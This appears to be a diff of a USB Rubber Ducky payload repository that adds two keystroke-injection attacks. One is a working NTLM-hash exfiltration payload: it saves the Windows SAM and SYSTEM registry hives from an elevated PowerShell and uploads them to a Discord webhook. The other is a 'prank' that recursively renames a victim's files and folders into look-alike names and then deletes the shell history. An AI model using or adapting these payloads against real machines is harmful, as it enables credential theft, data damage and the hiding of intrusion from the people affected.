+    REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+        IF ($_OS == WINDOWS) THEN
+            STRING HELLO WINDOWS!
+        ELSE
+            STRING HELLO WORLD!
+        END_IF
+    END_REM
+END_EXTENSION
+
 REM Open Discord app
 GUI
 DELAY 1000
@@ -74,11 +118,11 @@ TAB
 DELAY 500
 TAB
 DELAY 500
-DOWN_ARROW
+DOWNARROW
 DELAY 500
-DOWN_ARROW
+DOWNARROW
 DELAY 500
-DOWN_ARROW
+DOWNARROW
 DELAY 500
 ENTER
 DELAY 500

payloads/library/exfiltration/ntlm_exfiltration/README.md

@@ -0,0 +1,28 @@
+# Exfiltrate NTLM Hash - Windows ✅
+
+A script used to exfiltrate the NTLM hash on a Windows machine.
+
+## Description
+
+A script used to capture and exfiltrate the NTLM hash of a Windows machine. It utilizes PowerShell to retrieve the SAM and SYSTEM files, then sends them to a Discord webhook. These files can than be used to extract the NTLM hash of all users.
+
+### Settings
+
+* Set the Discord webhook URL
+* Ensure the webhook permissions are configured
+
+## Credits
+
+<h2 align="center"> Luu176 </h2>
+<div align=center>
+<table>
+  <tr>
+    <td align="center" width="96">
+      <a href="https://github.com/luu176">
+        <img src="https://avatars.githubusercontent.com/u/112649910?v=4?raw=true" width="48" height="48" />
+      </a>
+      <br>Github
+    </td>
+  </tr>
+</table>
+</div>

payloads/library/exfiltration/ntlm_exfiltration/payload.txt

@@ -0,0 +1,34 @@
+EXTENSION PASSIVE_WINDOWS_DETECT
+    REM VERSION 1.1
+    REM AUTHOR: Korben
+
+    DEFINE #MAX_WAIT 150
+    DEFINE #CHECK_INTERVAL 20
+    DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+    DEFINE #NOT_WINDOWS 7
+
+    $_OS = #NOT_WINDOWS
+
+    VAR $MAX_TRIES = #MAX_WAIT
+    WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+        DELAY #CHECK_INTERVAL
+        $MAX_TRIES = ($MAX_TRIES - 1)
+    END_WHILE
+    IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+        $_OS = WINDOWS
+    END_IF
+END_EXTENSION
+
+DEFINE #DISCORD_WEBHOOK_URL DISCORD_WEBHOOK_URL_HERE
+GUI d
+DELAY 1000
+GUI r
+DELAY 1000
+STRINGLN powershell Start-Process powershell -Verb runAs
+DELAY 3000
+LEFTARROW
+ENTER
+DELAY 3000
+STRINGLN C:\Windows\System32\reg save HKLM\SAM sam /y; C:\Windows\System32\reg save HKLM\SYSTEM system /y; Add-Type -AssemblyName "System.Net.Http"; $webhookUrl = "#DISCORD_WEBHOOK_URL"; $client = New-Object System.Net.Http.HttpClient; $fileStream1 = [System.IO.File]::OpenRead("sam"); $fileContent1 = New-Object System.Net.Http.StreamContent($fileStream1); $content1 = New-Object System.Net.Http.MultipartFormDataContent; $content1.Add($fileContent1, "file", "sam"); $client.PostAsync($webhookUrl, $content1).Result; $fileStream1.Close(); $fileStream2 = [System.IO.File]::OpenRead("system"); $fileContent2 = New-Object System.Net.Http.StreamContent($fileStream2); $content2 = New-Object System.Net.Http.MultipartFormDataContent; $content2.Add($fileContent2, "file", "system"); $client.PostAsync($webhookUrl, $content2).Result; $fileStream2.Close()
+DELAY 500
+GUI d

payloads/library/prank/Same_File_Name_Prank/README.md

@@ -0,0 +1,118 @@
+# Same File Name Prank
+
+This script, titled **Rename Everything Similarly**, is written in **DuckyScript 3.0** and designed to rename files and directories recursively on **Windows** or **GNU/Linux** systems, depending on the target environment. The script renames directories and files within a specified directory, giving them sequential and similar names.
+
+Specifically, the ability to add a blank space to the end of the name is used. On Windows systems, if file extension viewing is not enabled the names will look identical to the human eye, while on GNU/Linux systems the difference may be more easily noticed.
+
+![No extensions](https://github.com/aleff-github/Deposito/blob/main/Rename_Everything_Similarly/1.png?raw=true)
+
+> How does renaming files using spaces without seeing the extension appear on windows. - To the human eye they look identical.
+
+![With extensions](https://github.com/aleff-github/Deposito/blob/main/Rename_Everything_Similarly/2.png?raw=true)
+
+> What it looks like instead if you turn on the extension view.
+
+# Index
+
+1. [Features](#features)
+2. [Payload Structure](#payload-structure)
+   - [Conditional Target OS Execution](#conditional-target-os-execution)
+   - [PowerShell (Windows)](#powershell-windows)
+   - [Bash (GNU/Linux)](#bash-gnulinux)
+3. [How to Use](#how-to-use)
+4. [Why not MacOS?](#why-not-macos)
+5. [Notes](#notes)
+6. [Credits](#credits)
+
+
+## Features
+- **Cross-platform support**: The script can be executed on either **Windows** or **GNU/Linux** systems, based on the defined conditions, unfortunately it could not be published for macOS as well, [read more](#why-not-macos).
+- **Recursive renaming**: It renames all directories and files inside a given directory, iterating through subdirectories.
+- **Customizable**: Users can modify the base directory path and rename pattern as needed.
+
+## Payload Structure
+
+### Conditional Target OS Execution
+The script detects (*from the DEFINE*) the target OS and adapts to either **Windows** or **GNU/Linux**:
+- If the target system is **Windows**, the script will execute a PowerShell script.
+- If the target system is **Linux**, it will execute a Bash script.
+
+### PowerShell (Windows)
+For **Windows** systems, the script:
+- Opens **PowerShell** and runs the `Rename-Directories` and `Rename-Files` functions.
+- It renames directories by assigning sequential names like `d`, `dd`, etc., and files with names like `a`, `a `, `a  `, followed by their respective file extensions.
+
+### Bash (GNU/Linux)
+For **GNU/Linux** systems, the script:
+- Opens a terminal and executes two Bash functions: `rename_directories` and `rename_files`.
+- It performs similar renaming of directories and files, using `mv` to rename them with sequential names (like `d`, `dd`, etc... or `a`, `a `, `a  ` etc...).
+
+## How to Use
+
+1. **Edit Definitions (*not mandatory, Windows by default*)**: Adjust the following definitions in the script according to your environment:
+   - `DEFINE #TARGET_WINDOWS TRUE`: Leave **#TARGET_WINDOWS** to **TRUE** if the script will run on a Windows system.
+
+   - `DEFINE #TARGET_GNU_LINUX FALSE`: Set **TARGET_LINUX** to **TRUE** if the script will run on a GNU/Linux system.
+   
+   - Ufortunately it could not be published for macOS as well, [read more](#why-not-macos).
+
+   - `#DIRECTORY_WHERE_TO_RUN_THE_COMMAND`: Specify the base directory where the renaming operation should occur, the default is `.` so the default route of Powershell and Bash.
+   
+      Consider that the main route for Windows generally is `C:\Users\Username\` while for GNU/Linux systems it is something like `/home/username/` but in both cases if for istance you add `./Desktop/Hello/World/` you will go to the World folder in the path `C:\Users\Username\Desktop\Hello\World\` for Windows systems and `/home/username/Desktop/Hello/World/`.
+
+      Of course, you have to make sure that this folder exists....
+
+      ![Windows command](https://github.com/aleff-github/Deposito/blob/main/Rename_Everything_Similarly/3.png?raw=true)
+
+      > How Windows response to the command `cd ./Desktop/Hello/World/`
+
+      ![Ubuntu command](https://github.com/aleff-github/Deposito/blob/main/Rename_Everything_Similarly/4.png?raw=true)
+
+      > How Ubuntu response to the command `cd ./Desktop/Hello/World/`
+
+      Consider the maximum length of file names on both Windows and GNU/Linux:
+         
+      - [Limit on file name length in bash \[closed\]](https://stackoverflow.com/questions/6571435/limit-on-file-name-length-in-bash)
+         
+         |=> https://stackoverflow.com/questions/6571435/limit-on-file-name-length-in-bash
+
+      - [On Windows, what is the maximum file name length considered acceptable for an app to output? (Updated and clarified)](https://stackoverflow.com/questions/8674796/on-windows-what-is-the-maximum-file-name-length-considered-acceptable-for-an-ap)
+         
+         |=> https://stackoverflow.com/questions/8674796/on-windows-what-is-the-maximum-file-name-length-considered-acceptable-for-an-ap
+
+2. **Load Payload**: Upload the script to a USB Rubber Ducky device using the **DuckEncoder**.
+
+3. **Execute Payload**: Insert the USB Rubber Ducky into the target machine.
+
+## Why not MacOS?
+
+I am very sorry not to be able to release scripts for macOS systems as well but unfortunately not having one would be too risky to test it in a VM, at least in my opinion, so if someone from the community wants to contribute they could propose a pull request with the macOS version so that we can integrate it and make this payload cross-platfom.
+
+If I could know the behavior of this script on macOS (*which probably remains completely unchanged from use on GNU/Linux systems*) it could be optimized in that it could be reduced to a **WINDOWS_PASSIVE_DETECT** where if it is not Windows (*so generally GNU/Linux or macOS systems*) the bash script may be fine.
+
+## Notes
+- Ensure that the specified directories exist on the target machine.
+- Use with caution on sensitive systems, as the renaming process is recursive and may affect large directories.
+- Contributions to add support for macOS are welcome.
+
+## Credits
+
+<h2 align="center"> Aleff :octocat: </h2>
+<div align=center>
+<table>
+  <tr>
+    <td align="center" width="96">
+      <a href="https://github.com/aleff-github">
+        <img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
+      </a>
+      <br>Github
+    </td>
+    <td align="center" width="96">
+      <a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
+        <img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
+      </a>
+      <br>Linkedin
+    </td>
+  </tr>
+</table>
+</div>

payloads/library/prank/Same_File_Name_Prank/payload.txt

@@ -0,0 +1,222 @@
+REM_BLOCK
+#############################################
+#                                           #
+# Title        : Same File Name Prank       #
+# Author       : Aleff                      #
+# Version      : 1.0                        #
+# Category     : Prank                      #
+# Target       : Windows 10/11; GNU/Linux   #
+#                                           #
+#############################################
+END_REM
+
+REM I am very sorry not to be able to release scripts for macOS systems as well but unfortunately not having one would be too risky to test it in a VM, at least in my opinion, so if someone from the community wants to contribute they could propose a pull request with the macOS version so that we can integrate it and make this payload cross-platfom.
+
+REM %%%%% DEFINE-SECTION %%%%%
+REM_BLOCK
+    
+    Consider that the main route for Windows generally is “C:\Users\Username\” while for GNU/Linux systems it is something like “/home/username/” but in both cases if for example you add “./Desktop/Hello/World/” you will go to the World folder in the path “C:\Users\Username\Desktop\Hello\World\” for Windows systems and “/home/username/Desktop/Hello/World/” for **GNU/Linux** systems.
+
+    Of course, you have to make sure that this folder exists....
+
+    Payload Settings:
+        #DIRECTORY_WHERE_TO_RUN_THE_COMMAND - If you feel it is appropriate to run this script within a specific folder you will just need to change this definition.
+
+    Consider the maximum length of file names on both Windows and GNU/Linux:
+        - Limit on file name length in bash [closed]
+        |-> https://stackoverflow.com/questions/6571435/limit-on-file-name-length-in-bash
+        - On Windows, what is the maximum file name length considered acceptable for an app to output? (Updated and clarified)
+        |-> https://stackoverflow.com/questions/8674796/on-windows-what-is-the-maximum-file-name-length-considered-acceptable-for-an-ap
+
+END_REM
+DEFINE #DIRECTORY_WHERE_TO_RUN_THE_COMMAND .
+
+REM Set TARGET_WINDOWS to TRUE if the script will run on a Windows system.
+REM Set TARGET_LINUX to TRUE if the script will run on a GNU/Linux system.
+DEFINE #TARGET_WINDOWS TRUE
+DEFINE #TARGET_GNU_LINUX FALSE
+
+REM %%%%% PAYLOAD-SECTION %%%%%
+
+IF (( #TARGET_WINDOWS == TRUE) && (#TARGET_GNU_LINUX == FALSE)) THEN
+REM %%%%% WINDOWS CODE %%%%%
+
+    REM_BLOCK
+        Credits:    Hak5 LLC
+        Website:    https://hak5.org/
+        Source:     https://github.com/hak5/usbrubberducky-payloads/blob/master/payloads/extensions/passive_windows_detect.txt
+    END_REM
+
+    EXTENSION PASSIVE_WINDOWS_DETECT
+        REM VERSION 1.1
+        REM AUTHOR: Korben
+
+        REM_BLOCK DOCUMENTATION
+            Windows fully passive OS Detection and passive Detect Ready
+            Includes its own passive detect ready.
+            Does not require additional extensions.
+
+            USAGE:
+                Extension runs inline (here)
+                Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+                boot delay
+                $_OS will be set to WINDOWS or NOT_WINDOWS
+                See end of payload for usage within payload
+        END_REM
+
+        REM CONFIGURATION:
+        DEFINE #MAX_WAIT 150
+        DEFINE #CHECK_INTERVAL 20
+        DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+        DEFINE #NOT_WINDOWS 7
+
+        $_OS = #NOT_WINDOWS
+
+        VAR $MAX_TRIES = #MAX_WAIT
+        WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+            DELAY #CHECK_INTERVAL
+            $MAX_TRIES = ($MAX_TRIES - 1)
+        END_WHILE
+        IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+            $_OS = WINDOWS
+        END_IF
+
+        REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+            IF ($_OS == WINDOWS) THEN
+                STRING HELLO WINDOWS!
+            ELSE
+                STRING HELLO WORLD!
+            END_IF
+        END_REM
+    END_EXTENSION
+
+    GUI r
+    DELAY 1000
+    STRINGLN PowerShell
+    DELAY 1000
+
+    STRINGLN_POWERSHELL
+        cd #DIRECTORY_WHERE_TO_RUN_THE_COMMAND
+
+        function Rename-Directories {
+            param (
+                [string]$path,
+                [ref]$counter
+            )
+
+            $folders = Get-ChildItem -Path $path -Directory -Recurse | Sort-Object FullName -Descending
+            foreach ($folder in $folders) {
+                $newFolderName = "d" * $counter.Value  # Crea il nuovo nome della cartella
+                $newFolderPath = $newFolderName
+
+                $counter.Value++
+
+                Rename-Item -Path $folder.FullName -NewName $newFolderPath
+                Write-Host "Rinominata cartella: $($folder.FullName) -> $($newFolderPath)"
+            }
+        }
+
+        function Rename-Files {
+            param (
+                [string]$path,
+                [ref]$counter
+            )
+            $files = Get-ChildItem -Path $path -File -Recurse
+            foreach ($file in $files) {
+                $newFileName = "a" + " " * $counter.Value  # Crea il nuovo nome del file
+                $newFilePath = "$newFileName" + $file.Extension
+
+                $counter.Value++
+
+                Rename-Item -Path $file.FullName -NewName $newFilePath
+            }
+        }
+
+        $counter = 1; Rename-Directories -path $basePath -counter ([ref]$counter); $counter = 1; Rename-Files -path $basePath -counter ([ref]$counter); Remove-Item (Get-PSReadlineOption).HistorySavePath; exit
+    END_STRINGLN
+
+ELSE IF (( #TARGET_WINDOWS == FALSE) && (#TARGET_GNU_LINUX == TRUE)) THEN
+REM %%%%% GNU/LINUX CODE %%%%%
+
+    REM_BLOCK
+        Credits:    Hak5 LLC
+        Website:    https://hak5.org/
+        Source:     https://github.com/hak5/usbrubberducky-payloads/blob/master/payloads/extensions/detect_ready.txt
+    END_REM
+
+    EXTENSION DETECT_READY
+        REM VERSION 1.1
+        REM AUTHOR: Korben
+
+        REM_BLOCK DOCUMENTATION
+            USAGE:
+                Extension runs inline (here)
+                Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+                boot delay
+
+            TARGETS:
+                Any system that reflects CAPSLOCK will detect minimum required delay
+                Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
+        END_REM
+
+        REM CONFIGURATION:
+        DEFINE #RESPONSE_DELAY 25
+        DEFINE #ITERATION_LIMIT 120
+
+        VAR $C = 0
+        WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
+            CAPSLOCK
+            DELAY #RESPONSE_DELAY
+            $C = ($C + 1)
+        END_WHILE
+        CAPSLOCK
+    END_EXTENSION
+
+    CTRL-ALT t
+    DELAY 1000
+
+    STRINGLN_BASH
+        cd #DIRECTORY_WHERE_TO_RUN_THE_COMMAND
+
+        rename_directories() {
+            local path=$1
+            local counter=$2
+            
+            directories=$(find "$path" -type d | sort -r)
+            
+            for dir in $directories; do
+                new_folder_name=$(printf 'd%.0s' $(seq 1 "$counter"))  # Crea il nuovo nome della cartella
+                new_folder_path="$path/$new_folder_name"
+                
+                counter=$((counter + 1))
+                
+                mv "$dir" "$new_folder_path"
+            done
+        }
+
+        rename_files() {
+            local path=$1
+            local counter=$2
+            
+            files=$(find "$path" -type f)
+            
+            for file in $files; do
+                extension="${file##*.}"
+                
+                new_file_name="a$(printf ' %.0s' $(seq 1 "$counter"))"
+                
+                new_file_path="$(dirname "$file")/$new_file_name"
+                
+                if [[ "$extension" != "$file" ]]; then
+                    new_file_path="$new_file_path.$extension"
+                fi
+
+                counter=$((counter + 1))
+                
+                mv "$file" "$new_file_path"
+            done
+        }
+
+        counter=1; rename_directories "$base_path" $counter; counter=1; rename_files "$base_path" $counter; rm $HISTFILE; exit
+    END_STRINGLN
+END_IF